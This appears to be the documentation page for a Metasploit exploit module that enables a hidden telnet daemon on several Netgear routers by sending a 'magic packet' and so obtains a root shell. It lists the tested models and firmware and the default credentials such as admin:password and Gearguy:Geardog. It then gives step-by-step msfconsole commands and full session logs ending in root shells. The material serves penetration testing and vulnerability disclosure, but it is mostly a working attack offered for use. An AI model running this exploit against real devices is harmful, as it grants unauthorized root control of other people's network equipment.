4.4 KiB
Introduction
Several models of Netgear devices have a hidden telnet daemon that can be enabled for remote LAN users by sending a 'magic packet' to the device. Upon successful connect, a root shell should be presented to the user.
There are many devices which contain this daemon, for a full list see OpenWrt.
This module has been successfully tested against:
- AC1450 - unknown older firmware (TCP)
- AC1450 - latest firmware: V1.0.0.36_10.0.17 (UDP)
- N300 WNR2000 v3 - firmware: V1.1.2.10 (TCP)
Setup
A MAC address is required for exploitation. To determine the MAC address of the device:
- Ping the device to force an ARP lookup:
ping -c 1 [IP] - Get the MAC:
arp -an [IP]
If you are the root user, you can skip this step. ARP will be leveraged to find the MAC address.
Targets
0 (Automatic)
Detect if a device listens on TCP or UDP.
1 (TCP)
Older devices usually listen on TCP.
2 (UDP)
Newer devices usually listen on UDP.
Options
MAC
Set this to the MAC address of the device. You can use ping and arp
to find it.
You can leave this blank if you're root.
USERNAME
If this is an older device, it'll take the value of super_username in
nvram, which is usually unchanged from Gearguy.
If this is a newer device, it'll take the web UI username, which is
usually unchanged from admin.
You can leave this blank to use the default username.
PASSWORD
If this is an older device, it'll take the value of super_passwd in
nvram, which is usually unchanged from Geardog.
If this is a newer device, it'll take the web UI password, which is
usually unchanged from password.
You can leave this blank to use the default password.
Exploitation
- Make sure you have a vulnerable device
- Start metasploit
use exploit/linux/telnet/netgear_telnetenableset rhost [IP]set mac [MAC Address]if not running as rootexploit- Enjoy a root shell!
Usage
AC1450
As a normal user:
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.04 ms
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1
? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.3:34833 -> 192.168.1.1:23) at 2018-03-02 19:26:25 -0600
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
As root:
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
rmsf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP
[+] 192.168.1.1:23 - Found MAC address [redacted]
[+] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:37771 -> 192.168.1.1:23) at 2018-03-02 19:33:42 -0600
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#